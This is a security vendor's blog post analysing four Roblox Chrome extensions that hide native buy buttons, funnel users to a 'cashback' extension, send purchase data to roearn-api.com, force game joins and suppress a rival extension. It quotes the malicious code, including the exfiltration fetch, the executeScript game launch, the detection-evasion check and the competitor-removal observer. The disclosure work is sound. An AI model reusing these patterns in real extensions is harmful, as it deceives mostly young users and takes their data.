Four Chrome Extensions, One Scheme: How a Roblox Extension Network Is Farming Its Users
Four Chrome Extensions, One Scheme: How a Roblox Extension Network Is Farming Its Users
By Isa Can, Backend Developer | Eresus Security | June 29, 2026
Overview
During a routine review of Roblox-themed Chrome extensions, I found four extensions operating as a coordinated attack chain against Roblox users. Three of them — RoSearcher, BloxFinder, and a second extension also named RoSearcher with a different store ID — present themselves as player-finder utilities. The fourth, RoEarn, promises cashback on Roblox purchases. Together, they form a scheme that hijacks purchase flows, exfiltrates transaction data to an external server, silently forces users into specific Roblox games, and actively suppresses a competitor extension — all targeting a platform whose user base skews heavily toward children and teenagers.
What makes this operation notable is not just what it does, but its architecture: three independently listed funnel extensions with different names, different store pages, and overlapping audiences — all running the same injection code, all routing users into the same payload. One takedown doesn't kill it. This is deliberate redundancy.
This post covers the full technical breakdown of all four extensions, how the attack chain connects them, and what it means for affected users.
Scope, versions, and methodology
This is a version-specific static-analysis report. The findings below describe code observed in local package copies acquired for security research; they should not be read as a claim about every historical or future build of an extension.
- BloxFinder — Join Anyone on Roblox: version 26.1
- RoEarn: Custom Avatar Creator & Cashback: version 3.10.1
- RoSearcher: local copy identified as v20; Chrome Web Store ID was not confirmed in this analysis
- RoSearcher-2: Chrome extension ID
fcfdegencfkkpphgkogonmpckeofhgko; package version was not confirmed
The analysis was performed from local extension files. No active transactions, purchases, account actions, or communication with roearn-api.com were initiated. Where this report discusses a possible financial incentive or common operation, that is an inference from the observed code paths and should not be interpreted as a claim that every user or every current build follows that path.
Store listings, permissions, privacy notices, and extension code can change after an analysis. Users and platform operators should independently verify the currently installed version before acting.
Background: Roblox as a Target
Roblox is one of the largest gaming platforms in the world, with over 80 million daily active users — many of them under 16. Its virtual currency, Robux, is purchased with real money. The catalog sells avatar items, game passes, and bundles ranging from a few Robux to several thousand. Roblox also runs a Developer Exchange (DevEx) program that pays game creators based on engagement metrics including game visits and playtime.
This combination — real-money purchases, a young audience, and a creator monetization program — makes Roblox an unusually attractive target for browser extension abuse.
The Attack Chain
Before diving into each extension, it helps to see the full picture:
User browses Roblox catalog
→ RoSearcher OR BloxFinder hides Roblox's real "Buy" button
(two separate funnels, identical injection code, different store listings)
→ Fake "Buy with RoEarn" button appears in its place
→ Click opens Chrome Web Store page for RoEarn (with affiliate UTM)
→ User installs RoEarn
→ RoEarn hides ALL native Roblox purchase UI globally
→ User clicks "Buy with RoEarn" on any item
→ Purchase data (userId, assetId, price) POSTed to roearn-api.com
→ Server responds with a Roblox game instance ID
→ Extension silently launches that game
→ Operator earns DevEx revenue from forced game visits
→ User's full purchase history accumulates on roearn-api.com
The four extensions play two distinct roles. RoSearcher, BloxFinder, and RoSearcher-2 are independent funnels — separate Chrome Store listings with different names and IDs targeting overlapping Roblox audiences, all running identical or near-identical injection code that redirects into the same payload. RoEarn is the payload itself, executing data collection and engagement farming once installed. Three parallel funnels is not an accident: it multiplies install surface, provides redundancy against takedowns, and captures users searching under different terms.
Part 1: RoSearcher — The Funnel
RoSearcher is, on the surface, a legitimate tool. It adds a sidebar to Roblox game pages that lets you search for a specific player by username and find which public server they're in. The search logic is clean: it enumerates public servers via the Roblox API, batch-fetches player avatar thumbnails, and matches them against the target user's headshot. When found, it highlights the server and lets you join.
The legitimate functionality is real and it works. That's exactly the point.
Hiding the Real Buy Button
Buried inside RoSearcher's content scripts are three files that have nothing to do with player-finding: catalogInsert.js, gamepassInsert.js, and checkInsert.js.
catalogInsert.js runs on every Roblox catalog and bundle page. Its first act is to inject CSS that globally hides Roblox's native purchase buttons:
.shopping-cart-buy-button.item-purchase-btns-container .btn-container {
display: none !important;
}
It then fetches item details from the Roblox catalog API, calculates a fake "cashback" amount (10% of price × 0.70, minimum 2 Robux), and injects a replacement button with an animated gradient and the label "Buy with RoEarn (Earn X)". When the user clicks it, instead of purchasing anything, the button opens the RoEarn Chrome Web Store listing:
window.open(
'https://chromewebstore.google.com/detail/roearn-cashback-on-roblox/fooenmopnfaejehogdbmegaleanpdcea?utm_campaign=catalog',
'_blank'
);
It also calls removeCart(), which removes Roblox's shopping cart button from the page entirely. The user cannot easily return to the native purchase flow without knowing to remove RoSearcher.
gamepassInsert.js performs the same operation on game pass purchase buttons within game pages. Same CSS hiding, same fake button, same redirect. The campaign UTM changes to gamepass for tracking purposes.
Detection Evasion
checkInsert.js checks whether the RoEarn extension is already installed by looking for a DOM element (#nav-roearn) that RoEarn injects into Roblox's navigation. If that element is present, checkInsert.js sets localStorage.alreadyInstalled = "true". Both catalogInsert.js and gamepassInsert.js check this flag on startup and skip all injection if it is set.
The consequence is that the extension can show clean behaviour to a user who already has RoEarn installed. The promotional path is environment-dependent, so an automated review that installs both extensions simultaneously could miss the path observed in the local package.
The Three-Day Delay
sidebarInsert.js is the third piece. It does not run immediately. Instead, it reads a timeForButton value from localStorage and compares it against the current timestamp. If fewer than three days have elapsed since install, it does nothing. After three days, it injects a "RoEarn" link into Roblox's left navigation sidebar, pointing to the same Chrome Web Store page with ?utm_campaign=sidebar.
const THREE_DAYS_MS = 3 * 24 * 60 * 60 * 1000;
if (timePassed >= THREE_DAYS_MS) {
localStorage.setItem("showSidebarButton", "true");
createRoEarnButton();
}
Three days is long enough that most users will have forgotten when they installed RoSearcher and will not associate the new sidebar entry with it.
Part 1b: BloxFinder — The Second Funnel
BloxFinder ("BloxFinder — Roblox Player Finder", Chrome Store ID bnpkdbbfehooennlcojneoimfjgekdgn) is a second independently listed extension from the same operator. It offers the same cover story — find Roblox players in active game servers — and runs the same attack code under renamed filenames:
| BloxFinder file | RoSearcher equivalent | Purpose |
|---|---|---|
| findPlayers.js | content.js | Legitimate player search |
| gamepassPromo.js | gamepassInsert.js | Game pass button hijack |
| catalogItemPromo.js | catalogInsert.js | Catalog button hijack |
| checkStatus.js | checkInsert.js | Detection evasion |
| checkSidebar.js | sidebarInsert.js | Delayed sidebar ad |
The code is not just similar — it is the same, with surface renames. gamepassPromo.js injects a style element with the ID roearn-gamepass-promo-animation and defines an animation named roearn-gamepass-promo-rainbow-flow. The gradient colors are byte-for-byte identical to RoSearcher's gamepassInsert.js. The CSS hides Roblox's game pass purchase buttons using the exact same selector:
.PurchaseButton.rbx-gear-passes-purchase {
display: none !important;
}
The replacement button fires the same redirect to fooenmopnfaejehogdbmegaleanpdcea on the Chrome Web Store. The Chrome Store URL for BloxFinder itself contains ?utm_campaign=catalog — the same campaign tag that RoSearcher's catalogInsert.js appends to its redirect links — which means the tracking infrastructure treats both funnel extensions as equivalent traffic sources.
Why Two Funnels?
Running two separate listings achieves several goals for the operator:
- Redundancy. If one extension is reported and removed, the other continues generating installs.
- Broader reach. Different extension names surface to different users in store search results.
- Plausible deniability per listing. Each listing can be defended individually as a "player finder tool."
- Increased affiliate volume. More installs across two funnels = more RoEarn installs = more purchase events = more DevEx farming.
The BloxFinder package strengthens the evidence for a coordinated pattern with shared infrastructure and tracking, while attribution remains limited to the artefacts examined.
Part 1c: RoSearcher-2 — The Third Funnel
The third funnel extension (fcfdegencfkkpphgkogonmpckeofhgko) reuses the "RoSearcher" brand name under a different Chrome Store listing. This is a deliberate tactic: users searching for the original RoSearcher may find this listing instead, and vice versa. Both get infected. Both generate affiliate revenue for the operator.
The smoking gun is in addition/passInject.js:
btn.addEventListener('click', (evt) => {
evt.preventDefault();
evt.stopPropagation();
window.open(
'https://chromewebstore.google.com/detail/roearn-cashback-on-roblox/fooenmopnfaejehogdbmegaleanpdcea?utm_campaign=gamepass',
'_blank'
);
});
Same extension ID. Same UTM campaign tag (gamepass) as RoSearcher v20's gamepassInsert.js. The subdirectory path addition/passInject.js differs slightly from the flat structure of the other funnels, suggesting it may have been authored separately and later brought into the same operation — or structured to evade automated similarity checks between store listings.
The Chrome Web Store reviews page for this extension is publicly accessible, confirming active distribution to real users.
The Three-Funnel Pattern
With three funnel extensions confirmed, a clear operational picture emerges:
- Brand squatting: RoSearcher-2 copies the RoSearcher name, capturing users looking for the original.
- Category saturation: All three appear under "Roblox player finder" style searches.
- UTM differentiation: Each funnel uses UTM tags that let the operator track which extension is driving more RoEarn installs, and optimize accordingly.
- Takedown resilience: Chrome Web Store enforcement against one listing leaves the other two active.
Part 2: RoEarn — The Payload
Once installed, RoEarn is far more aggressive than RoSearcher. It does not merely redirect — it takes over Roblox's purchase interface entirely, phones home with every transaction, and silently controls where users are sent after each purchase.
Permissions
RoEarn requests scripting, storage, and alarms. It has host permissions for *://*.roblox.com/* and *://*.roearn-api.com/*. The alarms permission drives two repeating tasks: a locale poll every 30 seconds and an update check on startup. None of these permissions look alarming in isolation, which is the point.
Replacing the Entire Purchase UI
catalog-item.js runs early (before DOMContentLoaded) and immediately injects CSS that hides every Roblox purchase button on the page:
.btn-container:not([data-roearn-added="true"]) {
display: none !important;
}
Only buttons with data-roearn-added="true" — which RoEarn adds to its own cloned buttons — are visible. Roblox's buttons are present in the DOM but invisible to the user. Additionally, .timed-options-container is hidden before first render, suppressing Roblox's timed auction interface.
shopping-cart.js replaces Roblox's shopping cart:
.shopping-cart-btn-container {
display: none !important;
}
RoEarn injects its own cart icon into the navbar. The cart stores items in Chrome's storage.local as roearnCart.
When a user clicks "Buy with RoEarn", catalog-item.js fires a roearn:showCheckout custom event. checkout.js catches this and replaces the entire page with its own checkout interface:
const contentElement = document.getElementById('content');
if (contentElement) {
contentElement.innerHTML = newContent; // entire page replaced
// ...
}
The user now sees a RoEarn checkout page — not Roblox's. There is a product image, a price display, and a large "Play" button. No native Roblox purchase flow is accessible.
Every Purchase Reported to an External Server
When the user clicks "Play" on the RoEarn checkout page, injector.js sends a LAUNCH_GAME message to background.js. The background script posts the purchase details to roearn-api.com:
const response = await fetch("https://roearn-api.com/item_request", {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({
assetType,
assetId,
userId: String(userId),
assetPrice,
...(isDonation === true ? { isDonation: true } : {}),
...(isPlus === true ? { isPlus: true } : {})
})
});
This call happens for every purchase: individual items, bulk cart purchases, game passes, avatar items, donations, and "Plus" subscription items. The server receives the user's Roblox ID, the exact item purchased, its price, and contextual flags about the transaction type.
Beyond purchase events, the following additional endpoints receive user ID data:
| Endpoint | Data Sent |
|----------|-----------|
| /user_balance | userId |
| /manual_reviewal | userId |
| /has_referral | userId |
| /referral_stats | userId |
| /referral_list | userId |
| /user_subscription_status | userId |
| /withdraw | userId + gamepassId |
| /set_referral | userId + referralCode + gamepassId |
| /submit_video | userId + robloxUsername + videoUrl |
| /submit_tiktok | userId + robloxUsername + videoUrl |
| /avatar_editor_feedback | userId + images + avatarRenderPayload |
Every user of RoEarn is building a persistent profile on roearn-api.com: who they are, what they buy, how much they spend, who referred them, what videos they submit.
Forced Game Joins: The Engagement Farming Mechanism
The item_request response contains a field called instanceCreate. This is a Roblox game place ID. Immediately after receiving it, background.js executes a script in the page's MAIN world:
if (data.status === "ok" && data.instanceCreate) {
api.scripting.executeScript({
target: { tabId: sender.tab.id },
func: launchGameInstance,
args: [parseInt(data.instanceCreate), ""],
world: 'MAIN',
});
}
launchGameInstance calls window.Roblox.GameLauncher.joinGameInstance(placeId, instanceId), which launches the Roblox client and joins the specified game. The user, who just clicked "Play" expecting to buy an item, is sent to a game chosen entirely by roearn-api.com.
The server-side response controls which game instance is requested by the observed code path. Roblox's DevEx program rewards qualifying developer activity. If this routing is used at scale with operator-controlled destinations, it could create an incentive for artificial engagement; the local package alone cannot establish any operator's real-world revenue or payout outcome.
An "auto-join" checkbox in the checkout UI (localStorage.roEarnAutoJoin) makes the game launch happen automatically on page load without requiring the user to click at all. A user who checked this box once will be silently sent to the operator's game on every subsequent purchase.
This is the core risk identified by the analysis: cashback is presented as the incentive, while the game-join response can direct a user to a game they did not select. The code supports an engagement-routing pattern; its exact financial outcome is server-side and cannot be verified from the local package alone.
Suppressing a Competitor Extension
checkout.js opens with an immediately-invoked function called suppressRoPro(). RoPro is one of the most popular Roblox browser extensions, with millions of users. RoEarn actively destroys it:
const ROPRO_IDS = ['roproThemeFrame', 'roproThemeBackdropFrame'];
function injectRoProStyles() {
el.textContent = `
#roproThemeFrame {
display: none !important;
visibility: hidden !important;
width: 0 !important;
height: 0 !important;
}
...
`;
}
function removeRoProOverlays() {
ROPRO_IDS.forEach(function(id) {
var el = document.getElementById(id);
if (el) el.remove();
});
}
function startRoProObserver() {
_roProObserver = new MutationObserver(removeRoProOverlays);
_roProObserver.observe(document.documentElement, { childList: true, subtree: true });
}
The MutationObserver watches the entire document tree. Every time RoPro injects an element, it is immediately removed. This runs on every page load, on every Roblox user who has both extensions installed. The user gets no indication that one extension is actively destroying another.
Who Is Targeted?
Roblox's user demographics are heavily skewed toward minors. Roblox itself has reported that the majority of its users are under 17. These users are buying items with Robux their parents purchased with real money. They are unlikely to:
- Understand that a Chrome extension can hide and replace purchase buttons
- Notice that clicking "Buy with RoEarn" does not actually buy anything
- Know that a game they were sent to was not a random Roblox game
- Recognize that their purchase history is being recorded on a third-party server
- Know what developer exchange revenue is or how it can be gamed
The three-day delay in RoSearcher's sidebar injection, the detection evasion in checkInsert.js, and the "auto-join" checkbox that silently automates game visits are all design choices that reflect an awareness that the behavior must not be obvious.
What the "Cashback" Promise Actually Means
RoEarn presents itself as a cashback service: buy items on Roblox and earn a percentage back in Robux. The promised amounts are small (a few Robux on most purchases). The mechanism for delivering this cashback is never clearly explained.
Based on the code, the cashback appears to be funded from affiliate/referral commissions and DevEx payouts generated by the forced game visits. The user earns a few Robux. The operator earns Roblox developer exchange revenue from every user's visit to their game, at scale, across the entire install base. The math strongly favors the operator.
Whether the cashback is ever actually paid, and through what mechanism, is not verifiable from the extension code alone. The withdrawal flow (/withdraw endpoint, initiate-withdrawal.js) exists in the codebase, but the server controls the outcome.
Technical Findings Summary
| Finding | Severity | Extension | File |
|---------|----------|-----------|------|
| Forced game join / engagement farming | CRITICAL | RoEarn | background.js |
| Purchase data exfiltration to roearn-api.com | CRITICAL | RoEarn | background.js |
| Full native purchase UI replacement | CRITICAL | RoEarn | catalog-item.js, shopping-cart.js, checkout.js |
| Affiliate purchase button hijacking | HIGH | RoSearcher | catalogInsert.js, gamepassInsert.js |
| Affiliate purchase button hijacking | HIGH | BloxFinder | catalogItemPromo.js, gamepassPromo.js |
| Affiliate purchase button hijacking | HIGH | RoSearcher-2 | addition/passInject.js |
| RoPro competitor suppression | HIGH | RoEarn | checkout.js |
| Detection evasion (install-state check) | MEDIUM | RoSearcher | checkInsert.js |
| Detection evasion (install-state check) | MEDIUM | BloxFinder | checkStatus.js |
| Delayed sidebar injection (3-day timer) | MEDIUM | RoSearcher | sidebarInsert.js |
| Delayed sidebar injection (3-day timer) | MEDIUM | BloxFinder | checkSidebar.js |
| Timed auction UI suppression | MEDIUM | RoEarn | catalog-item.js |
| innerHTML with unsanitized cart data | LOW | RoEarn | shopping-cart.js |
| Infinite retry loop on network requests | LOW | RoSearcher | content.js |
Recommendations
If you have either extension installed: Remove it immediately from Chrome (chrome://extensions). Clear localStorage for roblox.com in DevTools (Application → Local Storage → https://www.roblox.com) to remove any injected state including the timeForButton, showSidebarButton, and alreadyInstalled keys.
If you are a parent: Check your child's Chrome extensions. RoSearcher presents as a helpful player-finder for Roblox. If installed alongside or before RoEarn, it may have already altered how your child sees and interacts with Roblox's store.
If you are a developer or researcher:
- Report both extensions to the Chrome Web Store review team via the built-in report mechanism
- File a report with Roblox's Trust & Safety team — the forced game joins constitute platform manipulation that violates Roblox's terms of service
roearn-api.comis collecting Roblox user IDs and transaction data without disclosed privacy policy terms visible within the extensions
Disclosure Notes
The extensions were analyzed from local disk copies obtained for security research purposes. No active communication with roearn-api.com was initiated during this analysis. This post is published to inform users and enable platform enforcement.
Extension IDs referenced:
- RoSearcher v20: local copy analyzed, Chrome Store ID not confirmed
- BloxFinder:
bnpkdbbfehooennlcojneoimfjgekdgn - RoSearcher-2:
fcfdegencfkkpphgkogonmpckeofhgko - RoEarn:
fooenmopnfaejehogdbmegaleanpdcea
Public references
The public listing and policy links identify the products discussed; they are not substitutes for the version-specific local-package evidence described in this report.
Isa Can is a Backend Developer at Eresus Security. Contact: isa@eresussec.com
Security Validation
Have you tested this risk in your own system?
Eresus Security delivers real exploit evidence through penetration testing, AI agent security, and red team operations.
Request a pilot testRelated Services